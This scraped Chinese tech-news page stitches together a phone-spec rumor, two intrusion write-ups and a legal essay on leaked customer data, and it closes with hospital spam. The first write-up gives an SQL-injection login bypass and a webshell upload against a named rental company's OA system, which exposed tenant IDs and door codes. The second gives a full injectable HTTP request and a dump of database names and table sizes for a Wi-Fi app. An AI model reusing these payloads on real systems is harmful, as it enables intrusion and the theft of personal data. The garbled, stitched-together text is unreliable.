科技网

当前位置: 首页 >通讯

泄漏客户信息传LGK7是低端机配置信息泄漏

通讯
来源: 作者: 2019-05-17 13:58:22

1 : 传LGK7是低端机配置信息泄漏

小编点评:与之前预感的高端机型相反,不过还只是传言,且待视察。

据国外媒体最新传言消息,LG正准备推出1款名为LG K7的智能手机,从泄漏的配置消息看来,这是款低端装备,应当会很便宜。LG K7将会采取5英寸480*854分辨率的显示屏,支持LTE网络连接。

泄漏信息中,LG K7的主要配置包括高通骁龙201处理器,这是颗4核1.1GHz的处理器,选配1.5GB RAM内存,和8GB内置存储空间,未知是不是支持扩大卡。前后置摄像头都是500万像素——听说是由于自拍对很多人来讲显得更重要。

未知LG K7价格是多少,预计在美国市场将由T-Mobile推出,发布时间也还不知道,预计是在未来几个月内。2 : 青客OA系统服务器可被入侵(3.6W+租户信息泄漏)智能家居真的好吗

昨天看到了301转发的xiao.k的青客漏洞。这个开门危害太大了~智能家居真的好吗?甚么都不想说了,我感觉我住的地方都没有门!没有门!没有门!

故事背景:

青客员工:我们的OA系统是我们老总自己写的。

我:。。。(自己写的OA系统,好吧,绝笔有漏洞!),你们老总挺利害的!

青客员工:我们老总吧啦 吧啦~~,走带你去签合同

。。。

然后在我眼皮底下,青客某员工登录了他的OA~《亮点在详细说明中》

00x01 入侵背景

刚刚来上海的时候,公司说和青客有合作,租房有优惠,其实没有甚么优惠,都是青客自己的优惠。青客租房还是比较方便的。在某业务员的带领下,去了他们1个分部去办理合同。他熟练的登录了OA系统,我当时就仔细看了下,是否是不常见的子域名,OK,原来站点就是

http://oa.qk365.com/

然后发现该业务员输入的账号是自己的中文名。中文名,成心思~

00x02 进入OA系统,获得最高权限

登录页面

手动检测下,是不是有POST注入或万能密码

那末就直接试试admin的账户,构造万能密码

admin' or '1'='1

成功登录

通过这个截图可以发现,用户admin的权限并没有我们所想的那末多,admin应当是1个权限控制的账号。

在权限调剂的地方,发现可以利用的用户了

林聪' or '1'='1

去登录吧。权限够大!

在林聪的光环下,全部注册会员36299条记录完全泄漏,泄漏信息包括但不限于

真实姓名 电话 身份证(正反面图片)

查询房间信息,可以查询开门密码。(智能家居真的好吗?)

00x03 拿下服务器

上传的地方如此之多,随便找了处上传,上传菜刀马,提权拿服务器。

林聪的管理权限以下

装潢预算装潢预算单元管理房间管理单价管理预算管理新建毛坯墙石膏线安装墙体粉刷给水管铺设排水管铺设强电铺设弱电铺设地板铺设踢脚线安装地面水泥找平地砖铺设墙砖铺设吊顶安装大理石铺设大理石挡水玻璃制作橱柜制作卫浴装备电器装备软装家具安装窗帘软装套装门安装签证项目股东管理股东管理股东列表股分管理工程进度管理系统工程进度管理系统项目列表待办列表误工列表未采购列表等待领料列表领料终了列表未提交审批列表主管审批列表未付款列表已付款列表用料列表施工人员列表价格列表供应商列表未提交审批列表材料主管审批列表材料未付款列表材料已付款列表材料驿家物业管理系统驿家物业管理系统托管合同录入会员合同录入杂费支出录入杂费开列账单电费开列账单调试用电开列账单补偿赠电开列账单水费开列账单托管合同导入待标房间列表托管合同列表会员合同列表房东列表会员列表单元列表房间列表房间列表新居间订价列表转租房间列表会员情况表房间定价比率账单列表房间账单列表托收租金列表使用费列表收银日记账支出列表收费列表居易通门锁重置使用费催收杂费催收单元实际收益统计实际总收益统计均价统计毛利率统计绩效列表人力本钱列表短信群发公告管理网上报修电表调试通讯盒列表收集器列表对账单缴费通知书催缴通知退房结算单用电清单月度催账表申请银行分期列银行分期未成功列银行分期使用费列托收租金单元托收租金月份付款清单单元付款清单月份收款纪录房间收款纪录月份收款纪录方式门锁水电表保护网络故障保护通讯盒故障保护旧收集器故障保护门锁电池保护门锁故障保护电表故障保护水表故障保护新收集器故障保护杂费支出录入房间订价列表会员预订列表定单列表网上机广告列表预期现金流统计预期收益统计租金付款计划工程进度管理系统新工程进度管理系统未开工项目开工中项目验收中项目已完工项目普通采购日志特殊采购日志补料采购日志未采购列表已采购列表待提交工资列表补料列表未发货列表已发货列表施工人员列表工序列表价格列表供应商列表用料列表待结算列表地址待结算列表批次待初审列表待复审列表待付款列表已付款列表备货申请备货采购备货初审备货复审备货付款备货已付款系数配置列表待结算列表新地址待结算列表新批次待初审列表新待复审列表新待付款列表新已付款列表新备货申请列表待初审备货列表待复审备货列表待付款备货列表已付款未入库列表已付款已入库列表已终止备货列表决算管理预算管理工程付款1览表预算配置待审批工资列表待付款工资列表已付工资列表房源采购系统房源采购系统申报房源上传房源图片待评分房源服务中心审批房源分公司审批房源待谈判房源分公司复审房源待签约房源签约成功房源放弃采购房源已交付房源采购进度列表交付进度列表板块管理地铁线路管理办公选项房东批量付款公共事业费批量付款统计报表统计报表房间报表会员报表销售管理系统销售管理系统当月销售员排行榜服务中心业务费用统计服务中心业务费用年终统计表房间管理员业务费用统计服务中心管家业务费用统计服务中心经理月度销售报服务中心房管员月度销售报房间信息填报服务中心审核市场部审核满房预退列表装修中房间列表合同评分列表销售线索会员满意度调查结果装机量报表安装未入住报表已推荐房间列表待推荐房间列表当月服务中心排行榜当月分公司排行榜当月销售带看排行榜服务中心待租房间排行榜分公司待租房间数排行榜服务中心满房报表分公司满房报表服务中心利润报表分公司利润报表满房房间列表待租房间列表带看准备列表待批带看列表历史带看列表预订房间列表转租房间列表报修列表人力列表税收列表管理列表人员数据报表货款分期管理系统货款分期管理系统会员登记新易贷申请列表人人分期申请列表人人分期待审批列表人人分期待放款列表人人分期已谢绝列表人人分期2次申请列表人人分期已放款列表民生贷款申请列表民生贷招待审批列表民生贷招待放款列表民生贷款已谢绝列表民生贷款2次申请列表民生贷款已放款列表新易贷待审批列表新易贷待放款列表新易贷已谢绝列表新易贷2次申请列表新易贷已放款列表新易贷收款列表新易贷未登记收款列表新易贷放款终止列表人人分期放款终止列表民生贷款放款终止列表松江民生贷款申请列表松江民生贷招待审批列表松江民生贷招待放款列表松江民生贷款已谢绝列表松江民生贷款2次申请列表松江民生贷款已放款列表松江民生贷款放款终止列表人人分期收款列表话务工单系统话务工单系统工单科目待实行列表已分拣列表派单结算申报待派单列表待回访列表已办结列表申报记录工单结算实行人工单结算派单人工单结算回访人实行人公共事业费缴费系统公共事业费缴费系统新建出账机构出账机构列表账单基础信息设置账单基础信息查询账单数据列表显示手工付费账单列表过失付费账单列表付费通批量销账智能平台智能平台验收维修审计故障前台签约系统前台签约系统会员注册预定入住退房换房收款开账租务退款电费充值水费充值快速注册交易查询财务对账续租中介提成列表淘宝预定报表管理系统报表管理系统服务中心销售月报间夜服务中心销售年报间夜房管员当月实际销售额报表房管员累计销售额报表销售房管员销售提成报表服务中心绩效展现房间月份维度报表服务中心绩效展现房间维度报表服务中心绩效展现单元月份维报表地主房管员管理提成报表服务中心当月毛利报表分公司当月净利报表服务中心房管员维度绩效报表服务中心所选区间绩效报表分公司所选区间绩效报表房管员提成计算报表服务中心分红计算报表服务中心费用登记房管员人力本钱导入单元保洁费导入房间利润情况表服务中心经理提成计算报表非服务中心办公费用表服务中心经理逐日销售报表房管员逐日销售报表电商后台管理电商后台管理概要统计定阅量统计预约量统计预定量统计签约量统计评论审核房屋托管用户留言审核房东未审核房东审核通过房东审核不通过租客未审核租客审核通过租客审核不通过消息推送房源未审核房源审核通过房源审核不通过数据纠正系统数据纠正系统房间定价服务中心纠正房管员纠正股分管理系统股分管理系统股东管理股分管理总股本管理新股发售管理配送管理配售管理期权管理新股发行2手交易股分平移配售交易期权交易公告管理董事会档案管理股东会档案管理系统预定录入定单定单大客户定单手工回访录入预订管理待定定单带看定单定单查询定单回访任务列表回访记录手工回访回访记录导出会员管理新增会员会员查询会员客历用户设置修改密码保安后台管理保安后台管理保安异常情况审核保安单元列表保安月巡查列表保安房源分配保安员管理保安排班管理保洁后台管理保洁单元月度统计保洁公司月度统计保洁公司管理保洁公司房源分配保洁员管理保洁员房源分配保洁员排班管理保洁单元列表运营报表管理系统考勤系统考勤规则法定节假日排班计划导入排班计划查询装备下发配置逐日考勤逐日考勤查询考勤报告人事考勤总表下载月统计考勤年统计考勤总经理查询任务管理系统管理系统利用利用列表管理利用模块管理利用操作管理权限调剂部门管理用户组管理用户管理角色管理公司管理行政级别管理职务管理

1、通过这些权限,可以知道青客拜托收租的价格,也知道了他们到底赚了租客多少钱。

2、知道了曾在租客租房的信息,这些信息危害太大

3、开门 开门 开门!

4、修改租房价格~

其他就不赘述了!

3 : wifi密探客户端存在注入致使千万用户泄漏/130多个城市/DBA权限

POST /CApp1_3_5/checkNet HTTP/1.1Content-Length: 69Content-Type: application/x-www-form-urlencodedHost: p.aijee.cnConnection: closeUser-Agent: android-async-http/1.4.3 (http://loopj.com/android-async-http)Cookie:PHPSESSID=uvg31p37bbo23i6ms65fldlln6; SERVERID=6f41b44ea2ad9c8fbb722f6e285fd6ba|1460777940|1460777940Cookie2: $Version=1Accept-Encoding: gzipuuid=48600807e2a4486898dd658d48073629&mac=08%3A00%3A27%3A25%3A83%3A6a

参数uuid存在注入

available databases [136]:[*] asbeta[*] authserver[*] information_schema[*]mysql[*] rdsh[*] rdsh2[*] rdsh2bak[*] rdsh_akesudiqu[*] rdsh_aletaidiqu[*] rdsh_anshan[*] rdsh_baicheng[*] rdsh_baishan[*] rdsh_baiyin[*] rdsh_baoding[*] rdsh_baotou[*] rdsh_bayannaoer[*] rdsh_beijing[*] rdsh_benxi[*] rdsh_binzhou[*] rdsh_cangzhou[*] rdsh_changchun[*] rdsh_changzhi[*] rdsh_chaoyang[*] rdsh_chengde[*] rdsh_chifeng[*] rdsh_chongzuo[*] rdsh_dalian[*] rdsh_dandong[*] rdsh_daqing[*] rdsh_datong[*] rdsh_dezhou[*] rdsh_dingxi[*] rdsh_dongying[*] rdsh_fangchenggang[*] rdsh_fushun[*] rdsh_fuxin[*] rdsh_guigang[*] rdsh_guilin[*] rdsh_guyuan[*] rdsh_haerbin[*] rdsh_hamidiqu[*] rdsh_handan[*] rdsh_hegang[*] rdsh_heihe[*] rdsh_hengshui[*] rdsh_hetiandiqu[*] rdsh_heze[*] rdsh_hezhou[*] rdsh_huhehaote[*] rdsh_huludao[*] rdsh_hulunbeier[*] rdsh_jiamusi[*] rdsh_jiayuguan[*] rdsh_jilin[*] rdsh_jinan[*] rdsh_jinchang[*] rdsh_jincheng[*] rdsh_jining[*] rdsh_jinzhong[*] rdsh_jinzhou[*] rdsh_jiuquan[*] rdsh_jixi[*] rdsh_kashidiqu[*] rdsh_kelamayi[*] rdsh_laibin[*] rdsh_laiwu[*] rdsh_langfang[*] rdsh_lanzhou[*] rdsh_liaocheng[*] rdsh_liaoyang[*] rdsh_liaoyuan[*] rdsh_linfen[*] rdsh_linyi[*] rdsh_log[*] rdsh_longnan[*] rdsh_lvliang[*] rdsh_mudanjiang[*] rdsh_panjin[*] rdsh_pay[*] rdsh_pingliang[*] rdsh_putian[*] rdsh_qingdao[*] rdsh_qingyang[*] rdsh_qinhuangdao[*] rdsh_qinzhou[*] rdsh_qiqihaer[*] rdsh_qitaihe[*] rdsh_rizhao[*] rdsh_sanming[*] rdsh_shenyang[*] rdsh_shijiazhuang[*] rdsh_shizuishan[*] rdsh_shuangyashan[*] rdsh_shuozhou[*] rdsh_siping[*] rdsh_songyuan[*] rdsh_suihua[*] rdsh_tachengdiqu[*] rdsh_taian[*] rdsh_taiyuan[*] rdsh_tangshan[*] rdsh_tianjin[*] rdsh_tianshui[*] rdsh_tieling[*] rdsh_tonghua[*] rdsh_tongliao[*] rdsh_tulufandiqu[*] rdsh_weifang[*] rdsh_weihai[*] rdsh_wuhai[*] rdsh_wulanchabu[*] rdsh_wulumuqi[*] rdsh_wuwei[*] rdsh_wuzhong[*] rdsh_wuzhou[*] rdsh_xinganmeng[*] rdsh_xingtai[*] rdsh_xining[*] rdsh_xinzhou[*] rdsh_yangquan[*] rdsh_yantai[*] rdsh_yichun[*] rdsh_yinchuan[*] rdsh_yingkou[*] rdsh_yulin[*] rdsh_yuncheng[*] rdsh_zaozhuang[*] rdsh_zhangjiakou[*] rdsh_zhangye[*] rdsh_zhongwei[*] rdsh_zhou[*] rdsh_zibo[*] rdshbak[*] rdshtest[*] root[*] test

DBA权限

有两个user的表

千万用户

+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| rdsh_wm_user | 42644005 || rdsh_push_log_postion | 6425031 || rdsh_coupon_mt_role | 4777601 || rdsh_app_count | 3783171 || rdsh_coupon_mt | 2081793 || rdsh_wm_router | 1980000 || rdsh_wm_business_day | 1848251 || rdsh_wm_business | 1811110 || rdsh_router_warning | 1274784 || rdsh_coupon_nm_shop | 1157876 || rdsh_portallog | 1023002 || rdsh_user | 860361 || rdsh_coupon_mt_shop | 836490 || rdsh_coupon_nm_shop_bak | 640520 || rdsh_push_current_postion | 614973 || rdsh_smsinterfacelog | 559888 || rdsh_wifi_speed_log | 519264 || rdsh_imagelib | 428069 || rdsh_business_dp | 384370 || rdsh_business_status | 384370 || rdsh_deal_business | 378170 || rdsh_deal_image_more | 373569 || rdsh_coupon_nm_role_bak | 341461 || rdsh_deal | 292367 || rdsh_coupon_nm_role | 262659 || rdsh_business1 | 248561 || rdsh_image | 247861 || applog | 239581 || rdsh_coupon_nm | 239514 || rdsh_deal_restriction | 239200 || rdsh_wificonf | 221395 || rdsh_business_fans | 206737 || rdsh_coupon_nm_role_his | 190375 || rdsh_wifi_android_log | 183767 || rdsh_special_subject_log | 168739 || rdsh_sign | 142881 || rdsh_fans_count | 135971 || rdsh_wx_unionid | 127687 || tomato_report_log | 126725 || rdsh_business_wifi | 123853 || rdsh_coupon_nm_bak | 119984 || rdsh_setting | 107414 || rdsh_business_account | 106680 || rdsh_slide_business | 105832 || rdsh_merchant | 102423 || rdsh_business | 101440 || rdsh_push_log | 90398 || rdsh_ad_capp_home_log | 88939 || rdsh_agent_business | 80773 || rdsh_wifiscanlog | 78198 || rdsh_ce | 75011 || rdsh_coupon_count | 66450 || rdsh_send_push_log | 65507 || rdsh_business_wifi_audit_user | 60664 || rdsh_business_qrlog | 60012 || rdsh_business_coupon_fans | 50462 || rdsh_tongji | 44382 || rdsh_day_static | 37999 || rdsh_business_fans_dd_count | 35808 || rdsh_mall_business | 30854 || rdsh_coupon_mt_role_his | 30314 || rdsh_accounttable | 22626 || rdsh_business_dp_goods | 22574 || rdsh_business_static | 22521 || rdsh_accountrel | 21422 || rdsh_accountlog | 17583 || rdsh_goods_img | 15506 || rdsh_goodsprice | 15377 || rdsh_goods | 15259 || rdsh_classes_goods_business | 15030 || rdsh_business_wifi_shield | 11981 || rdsh_business_dp_img | 11287 || rdsh_business_instore_promotion | 11157 || rdsh_coupon_mt_his | 10000 || rdsh_coupon_nm_his | 10000 || rdsh_business_wifi_pwd_error | 7497 || rdsh_onlinebill | 7399 || rdsh_business_cloudstore_realname | 7236 || rdsh_goods_show | 6495 || rdsh_neighborhood | 6064 || rdsh_channel | 5808 || rdsh_business_coupon | 5154 || rdsh_user_wxqrcode | 4559 || rdsh_business_wifi_copy4 | 4554 || rdsh_classes | 4338 || rdsh_user2 | 4319 || rdsh_column_business | 4182 || rdsh_user_sharepoint | 4180 || rdsh_goods_browse_log | 4000 || rdsh_dp_count | 3516 || rdsh_district1 | 3446 || rdsh_business_shorturl | 3187 || rdsh_trace_log | 3141 || rdsh_district | 3092 || rdsh_userfeedback | 2931 || rdsh_business_wifi_audit | 2910 || rdsh_business_guest | 2876 || rdsh_promotion_partake | 2699 || rdsh_business_service | 2674 || rdsh_promotion_collect | 2652 || rdsh_sms | 2434 || rdsh_contract | 2287 || rdsh_image_txt_business | 1889 || rdsh_trade_static | 1848 || rdsh_special_subject_products | 1827 || rdsh_app_version | 1803 || rdsh_tm_goods | 1627 || rdsh_router | 1574 || rdsh_business_giftresult | 1545 || rdsh_visit_business | 1218 || rdsh_review | 1164 || rdsh_ordertreatlog | 1085 || rdsh_business_vip | 1050 || rdsh_call_business | 973 || rdsh_business_nearpush | 896 || rdsh_download_app | 896 || rdshb_contract | 841 || rdsh_business_offer | 805 || rdsh_agent_users | 779 || rdsh_platuser_role | 762 || rdsh_bankcard_bin | 725 || rdsh_ibeacon | 681 || rdsh_orderitems | 647 || rdsh_goodsdaystatic | 642 || rdsh_wxshake | 604 || rdsh_category_b | 598 || rdsh_dt_count | 505 || rdsh_plat_user | 490 || rdsh_portal_count | 479 || rdsh_device_count | 477 || rdsh_review_business | 440 || rdsh_business_cloudstore | 426 || rdsh_aijee_area | 424 || rdsh_business_black_white_mac | 423 || rdsh_business_fans_privilege | 405 || rdsh_citys_yd | 387 || rdsh_system_message | 386 || rdsh_system_message_status | 386 || rdsh_service_business | 380 || rdsh_platform_order | 372 || rdsh_city | 360 || rdsh_ordertable | 359 || tomato_report | 337 || rdsh_server_finance_status | 334 || rdsh_orderpost | 307 || rdsh_wxshake_url | 282 || rdsh_business_opener_sub | 279 || rdsh_category_mx | 278 || rdsh_business_opener | 267 || rdsh_special_subject | 256 || rdsh_business_fav | 255 || rdsh_stat_day_activity_register | 255 || rdsh_stat_day_au | 255 || rdsh_stat_day_retention_rate | 255 || rdsh_stat_day_start_up_time_used | 255 || rdsh_transaction_pay_log | 253 || rdsh_work_order | 250 || rdsh_business_msg | 221 || rdsh_special_subject_comment | 200 || rdsh_router_cancellog | 197 || rdsh_reviews_business | 185 || rdsh_user_habit | 185 || rdsh_cash_apply | 145 || rdsh_promotion_comment | 138 || rdsh_cash_job | 119 || rdsh_offlinepos | 114 || rdsh_business_wifi_bak | 111 || rdsh_joinus_apply | 110 || rdsh_paper_withdraw | 107 || rdsh_promotion | 107 || rdsh_agent | 106 || rdsh_feedback | 101 || rdsh_receive_gift | 95 || rdsh_shopping_cart | 92 || rdsh_business_bank | 90 || `temporary` | 88 || rdsh_member_address | 87 || rdsh_goodsold | 86 || rdsh_business_bank_list | 82 || rdsh_wifi_business_auto | 81 || rdsh_voucher | 66 || rdsh_special_subject_praise | 52 || rdsh_buy_agent_goods | 48 || rdsh_category_c | 42 || rdsh_crontab | 38 || rdsh_log_ceshi | 38 || rdsh_router_conf | 37 || rdsh_stat_week_au | 37 || rdsh_stat_week_retention_rate | 37 || rdsh_app_ad | 35 || rdsh_coupon_business | 35 || rdsh_province | 35 || rdsh_discount_info | 32 || rdsh_slide | 29 || rdsh_column | 26 || rdsh_jd_goods | 26 || rdsh_wechat_menu | 26 || rdsh_user_card | 24 || rdsh_voucher_user | 22 || rdsh_business_review | 21 || rdsh_aijee_msg | 20 || rdsh_platrole | 16 || rdsh_wifiscan | 14 || rdsh_pad | 13 || rdsh_category_a | 12 || rdsh_paper | 11 || rdsh_report | 10 || rdsh_business_contacts | 9 || rdsh_ordercomplaint_img | 9 || rdsh_stat_month_au | 9 || rdsh_wechat_word | 9 || rdsh_business_ddsms | 8 || rdsh_stat_month_retention_rate | 8 || rdsh_vocational_img | 8 || rdsh_wechat_sub | 7 || rdsh_business_weixin_account | 6 || rdsh_image_txt | 6 || rdsh_wechat_def | 6 || rdsh_gift | 5 || rdsh_paper_probability | 5 || rdsh_sms_interface | 5 || rdsh_wechat_img | 5 || rdsh_message_moban | 4 || rdsh_ordercomplaint | 4 || rdsh_smsjoblog | 4 || rdsh_voucher_moban | 4 || rdsh_acctool | 3 || rdsh_agent_user | 3 || rdsh_business_area_voucher | 3 || rdsh_business_role | 3 || rdsh_cam | 3 || rdsh_userfeedbackreply | 3 || rdsh_business_msg_rules | 2 || rdsh_userfeedbackreply_moban | 2 || rdsh_agent_role | 1 || rdsh_app_ad_customer | 1 || rdsh_business_coupon_push | 1 || rdsh_business_scene | 1 || rdsh_paper_set | 1 || rdsh_pos | 1 || rdsh_sys_conf | 1 |+-----------------------------------+---------+

4 : 对房地产公司或物业公司泄漏客户信息行动的分析意见

对房地产公司或物业公司泄漏客户信息的意见

——谈SONY 黑客门对我国保护公民隐私权的鉴戒意义

本日浏览新京报,了解到电器巨头SONY公司因其旗下的PlayStation游戏网络遭黑客入侵,大量用户信息被泄漏可能面临高达2万亿日元(相当于人民币1590亿元)的巨额赔偿。

同时,该报还报导,2004年,日本雅虎大约460万用户个人信息外泄,日本雅虎后来向每位用户派送500日元。2009年,日本人寿保险公司阿利科因3万元顾客信誉卡信息外泄,终究向每名受害者赔偿了1万日元。还曾有日本美容企业因顾客信息外泄,结果被法院勒令向每位顾客赔偿3万日元。

因本人不了解日本的法律、法规,不知日本法院就此类情况作出的判决的根据何在。但根据对国内法律、法规的了解,如果此类情形产生在国内,如因黑客入侵的缘由致使公司客户资料的大量外泄,公司通常会以不可抗力或系黑客的犯法行动致使资料外泄等理由来进行抗辩,从而到达免责的目的。并且,司法实践中,法院1般不会基于黑客的入侵行动致使客户资料外泄而判令公司承当相应的民事或刑事责任。

斟酌到黑客入侵致使客户资料外泄存有较大的特殊性,不具有普遍的指点意义。我更多斟酌的是,在国内,如果客户资料的外泄系基于公司或公司员工的故意行动致使的,该等故意泄漏客户信息的行动公司是不是需要承当相应的刑事或民事责任的问题。

前年年底,本人购买了号称北苑5大神盘之1的某个知名楼盘的1套商品房,合同约定今年9月底交房。在今年春节后,本人就陆陆续续接到大量的装修公司的“骚扰”电话,不断询问本人是不是有装修意愿,其实不断地推荐其新出台的促销活动及各类优惠政策,希望本人赴公司或项目现场进行参观。多的时候,1天78次,少的时候,35天1回,反正每到周末,基本上都会有电话定时“问候”,烦不胜烦。“骚扰”电话不但知晓本人的姓名,还知道是该楼盘的业主及购买的具体楼号,并知道楼盘的具体进展及交付时间。每次本人反问其从何处了解本人的具体联系方式,每装修公司都理直气壮地答复,是物业公司告知他们的。我反问到,是花钱从物业那买的吧?沉默以对。

就此类故意泄漏客户个人信息的行动是不是触犯了法律或侵犯了客户的相干权利,我检索了1下我国的法律、法规。

《中华人民共和国刑法修正案7》第7条规定:“在刑法第2百5103条后增加1条,作为第2百5103条之1:“国家机关或金融、电信、交通、教育、医疗等单位的工作人员,违背国家规定,将本单位在实行职责或提供服务进程中取得的公民个人信息,出售或非法提供给他人,情节严重的,处3年以下有期徒刑或拘役,并处或单处罚金。“盗取或以其他方法非法获得上述信息,情节严重的,依照前款的规定处罚。“单位犯前两款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照各该款的规定处罚。”

应当说,《刑法修正案7》已根据我国经济发展的需要和新出现的情况,对刑法进行了及时的更新和修改,并增加了“出售、非法提供公民个人信息罪”,这也进1步表明国家加大对公民个人的信息或隐私的保护力度。但是,该规范所触及的犯法主体是“对在实行职责或提供公共服务进程中利用1定的公权利收集到的公民个人信息的国家机关或单位,违背法律规定的保密义务应负的刑事责任”。立法部门并未将包括开发商、物业公司、中介机构等可能泄漏公民信息的行动人列为犯法主体,同时也未将所有泄漏公民信息的行动都列为犯法,“致使刑法的规制与惩罚未能及于全部的行动和主体”,并在1定程度上变相鼓励了“不适格主体”泄漏客户信息的主观能动性。

斟酌到目前《刑法修正案7》并未直接将房地产开发商、物业公司等非实行职责或提供公共服务进程中利用1定的公权利获得公民信息的主体列为刑法的打击对象,故从刑事责任角度,基本可以排除开发商和物业公司泄漏客户信息的责任。到然,我们寄希望于立法部门或最高人民法院能对“国家机关或金融、电信、交通、教育、医疗等单位的工作人员”中“等”的范围进行扩大化解释,将开发商、物业或其他中介机构都涵盖进去,从而到达“人人同等”的目的。

我们再来分析1下开发商、物业公司或其他中介公司泄漏客户信息,民事方面可能应当承当的责任。

《合同法》第610条规定:“当事人应当依照约定全面实行自己的义务。当事人应当遵守诚实信誉原则,根据合同的性质、目的和交易习惯实行通知、协助、保密等义务。”

依照上述法律规定,买受人或1般的消费者与单位基于某种行动建立了合同关系,并基于双方的合同关系向单位告知了个人的具体信息,如联系方式等触及个人隐私方面的资料,那末单位作为合同的相对方应当负有不得随便对外表露的保密义务,这属于合同的附随义务。但开发商和物业公司并未依照法律规定实行附随义务,故其行动已构成了背约,应当承当相应的背约责任。

我们知道:《合同法》项下的背约责任的承当通常是从合同约定,如果合同未具体约定背约责任,则更多斟酌背约方应实际赔偿基于其背约行动给守约方酿成的损失。而损失如何计量,是1个困难。毕竟,开发商或物业公司泄漏了买受人的个人信息,直接致使的结果是买受人不断被装修单位或其他单位电话“骚扰”而已,而上述“骚扰”的损失如何计量,确切难以量化,这是实践中存在的困难,也是大部份业主没法通过诉讼途径主张权利的1大障碍。

还有1点,作为业主而言,就其个人资料被泄漏究竟是开发商干的还是物业干的或其它单位干的很难举证,特别在公安部门不参与的情况下,单凭业主本身的气力难以证明其个人资料究竟是哪方主体给泄漏的(即便业主有装修公司电话骚扰的录音,乃至有装修公司明确表示是从开发商或物业手中获得的业主信息,但如果开发商或物业否认的话,其证明效率很难得到法院的支持。即便业主将装修公司列为共同被告,因骚扰电话1般是装修公司的工作人员通过手机拨打的,故装修公司完全可以否认系其公司行动,乃至可以否认其公司存在这样的工作人员),这样致使其诉讼要求得到支持的可能性又进1步下降。固然,法院可以斟酌案件的具体情况,适用举证责任颠倒的制度,由开发商或物业公司提供证据证明其已全面实行了合同的附随义务,不存在泄漏客户信息的可能,从而下降作为弱势群体1方的买受人的举证义务。

个人认为:就开发商或物业公司故意泄漏业主信息的行动在1定程度上也能够理解为,开发商或物业公司侵犯了业主的隐私权,故业主可以要求开发商或物业公司承当相应的侵权责任。

斟酌到我国法律没有明确地规定隐私权的概念,也没有对隐私权进行具体的定义,故公民隐私权的保护更大程度上体现为对公民名誉权的保护,而泄漏公民的个人信息的行动,如果被泄漏的信息不触及个人肖像、名誉、姓名等身份权的话,确切难以直接认定为侵犯了公民的名誉权,也没法通过保护公民名誉权的规定来追究开发商或物业公司的侵权责任。

如果业主主张开发商或物业公司泄漏其个人信息的行动构成侵权,一样的,该等权利主张,实践中仍存在较大的障碍。1是业主举证不能。业主难以证明此等侵权行动系开发商或物业公司所为;2是侵害事实如何认定。业主难以证明此侵权行动所酿成的实际侵害后果。

不管业主认定开发商或物业公司的泄漏行动属于背约行动还是侵权行动,业主在实践中都存在举证困难和权利主张存在巨大障碍的问题,这也是开发商或物业公司或其他中介公司之所里敢肆无忌惮泄漏或出售客户个人信息的重要缘由之1。

反过来,我们再看日本关于公司泄漏客户信息的处理模式[www.loach.net.cn)。虽然本人尚不了解日本就此类情形的具体惩办措施及相应的法律根据,但最少,从法院判决的角度动身,日本法院可以依照公司实际泄漏客户信息的数量,依照1定的数额判令公司对所有泄漏信息的客户承当赔偿责任。这1方面加大了公司泄漏客户信息的惩罚力度,另外一方面也大大下降了被泄密客户主张权利的难度。只要客户信息被泄漏了,客户完全可以凭法院的判决直接要求公司支付赔偿金。这必将大大加强公民的维权意识,也有益于全部社会对信息安全的重视程度,提高公民的隐私权的保护力度。

应当说,日本隐私权泄漏的保护制度对目前公民信息被大量泄漏和滥用的中国有非常积极的鉴戒意义。如果,中国能够建立以保护公民隐私为动身点的司法制度,完善公民隐私的立法保护,致力于打击故意、主动泄漏公民隐私的背法行动,司法机关,从便利被泄密公民主张权利的角度动身作出对公民有益的制度安排(如举证责任颠倒,实际损失法院酌定,加大惩罚泄漏主体力度等)。我相信,我们的骚扰电话会大大地减少,公民被电话讹诈的刑事案件发案率也会大大下降。最少,作为普通民众,我们能睡1个不受“骚扰电话或短信”打扰的安稳觉。期盼这1天尽快到来。

治疗白癜风沧州那家医院好廊坊癫痫病要怎么治疗呢治疗癫痫的药物效果好的有吗

相关推荐